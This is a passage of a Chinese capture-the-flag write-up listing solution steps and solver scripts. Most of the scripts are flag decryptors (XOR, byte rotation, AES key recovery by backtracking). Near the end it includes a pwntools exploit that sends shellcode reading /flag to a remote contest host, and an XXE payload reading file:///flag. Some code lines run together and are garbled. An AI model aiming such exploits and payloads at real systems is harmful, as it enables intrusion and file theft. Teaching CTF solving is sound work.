解题列表
根据提示一步一步走,经过猜测,测试出app.py
经过仔细研读代码,找到密钥
编写python代码拿到flag
key = 'secret_key9828' flag='d9d1c4d9e0d6c29e9aad71696565d99bc8d892a8979ec7a69b9a6868a095c8d89dac91d19ba9716f63b5' new=bytearray() flag=bytes.fromhex(flag) for i in range(len(flag)):decrypt=flag[i]-ord(key[i%len(key)])new.append(decrypt) print(new)
打开之后,经过翻找得到flag
使用分析工具CTF-NetA-V0.3.0一把梭
在cyberchef解密即可
from Cryptodome.Cipher import AES
b = {
'7': ['3', '4', '5', '6', '7', '8', '9', 'a', 'b'],
'4': ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b'],
'a': ['a', 'b', 'c', 'd', 'e', 'f'],
'e': ['c', 'd'],
'b': ['9', 'a', 'b', 'c', 'd'],
'3': ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd'],
'5': ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a'],
'6': ['4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd'],
'c': ['0', '1', '2', '3'],
'f': ['7'],
'd': ['c', 'd', 'e'],
'1': ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd',
'e'],
'9': ['0', '1', '2', '3', '4', '5', '6'],
'0': ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd',
'e', 'f']
}
gift = 64698960125130294692475067384121553664
key1_hex = "74aeb356c6eb74f364cd316497c0f714"
cipher =
b'6\xbf\x9b\xb1\x93\x14\x82\x9a\xa4\xc2\xaf\xd0L\xad\xbb5\x0e|>\x8c|\xf0^dl~X\xc
7R\xcaZ\xab\x16\xbe r\xf6Pl\xe0\x93\xfc)\x0e\x93\x8e\xd3\xd6'
char_to_num = {f"{i:x}": i for i in range(16)}
b_numeric = {}
for k in b:
k_num = char_to_num[k]
b_numeric[k_num] = [char_to_num[c] for c in b[k]]
key1_digits = [char_to_num[c] for c in key1_hex]
gift_bin = bin(gift)[2:].zfill(128)
18 / 21gift_nibbles = [int(gift_bin[i*4 : (i+1)*4], 2) for i in range(32)]
candidates = []
for i in range(32):
k = key1_digits[i]
g = gift_nibbles[i]
user_candidates = b_numeric.get(k, list(range(16)))
valid_candidates = [c for c in user_candidates if (c & k) == g]
candidates.append(valid_candidates)
def solve():
used = [False] * 16
mapping = {}
def backtrack(pos):
if pos == 32:
key0_digits = [mapping[k] for k in key1_digits]
key0_hex = "".join(f"{c:x}" for c in key0_digits)
try:
aes0 = AES.new(bytes.fromhex(key0_hex), AES.MODE_CBC,
bytes.fromhex(key1_hex))
aes1 = AES.new(bytes.fromhex(key1_hex), AES.MODE_CBC,
bytes.fromhex(key0_hex))
plaintext = aes0.decrypt(aes1.encrypt(cipher))
if b"flag{" in plaintext:
print("Found valid key0:", key0_hex)
print("Flag:", plaintext.decode())
return True
except:
pass
return False
k = key1_digits[pos]
if k in mapping:
return backtrack(pos + 1)
for c in candidates[pos]:
if not used[c]:
valid = True
for future_pos in range(pos+1, 32):
future_k = key1_digits[future_pos]
if future_k == k:
19 / 21future_g = gift_nibbles[future_pos]
if (c & future_k) != future_g:
valid = False
break
if not valid:
continue
used[c] = True
mapping[k] = c
if backtrack(pos + 1):
return True
del mapping[k]
used[c] = False
return False
sorted_positions = sorted(range(32), key=lambda x: len(candidates[x]))
return backtrack(0)
if not solve():
print("No valid mapping found.")
block = [0x00, 0x05, 0x83, 0x80, 0x8E, 0x2B, 0x00, 0x83, 0x2F, 0xAA, 0x2B, 0x81, 0xA8, 0xA5] v17 = [0x13, 0x39, 0xBE, 0xBE, 0xB4, 0x38, 0xB8, 0xBA, 0xBB, 0xB4, 0x3E, 0x90, 0x3A, 0xBA, 0xB4] v16 = [0x8B, 0x89, 0x22, 0x88, 0x8B, 0x20, 0x09, 0x22, 0x88, 0x08, 0x8D, 0x88, 0xAF]key1 = 0x99 ^ 0xFF key2 = 0xDD ^ 0x99 key3 = 0xFF ^ 0xDDdef left_shift(byte):return ((byte << 1) | (byte >> 7)) & 0xFFdef xor_operation(data, length, key):result = []for i in range(length):new_byte = key ^ left_shift(data[i])result.append(new_byte)return resultresult1 = xor_operation(block, 14, key1) result2 = xor_operation(v17, 15, key2) result3 = xor_operation(v16, 13, key3) flag = ''.join(map(chr, result1 + result2 + result3)) print(flag)
from pwn import *
# p = process(r'D:\桌面\lllqqq\RuneBreach_331d31358bec3706d88a7bbe11e12bee\chall')
p = remote('8.147.132.32', 19652)
context(arch='amd64', os='linux', log_level='debug')
for _ in range(4):
p.recvuntil(b'Defend? (y/N): ')
p.sendline(b'n')
p.recvuntil(b'Your place is mine now ')
shell_addr = int(p.recvuntil(b'!\n', drop=True), 16)
print('exec_area:', hex(shell_addr))
shellcode = asm(shellcraft.cat('/flag'))
p.sendline(shellcode)
p.interactive()
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///flag">]>
<root>&xxe;</root>
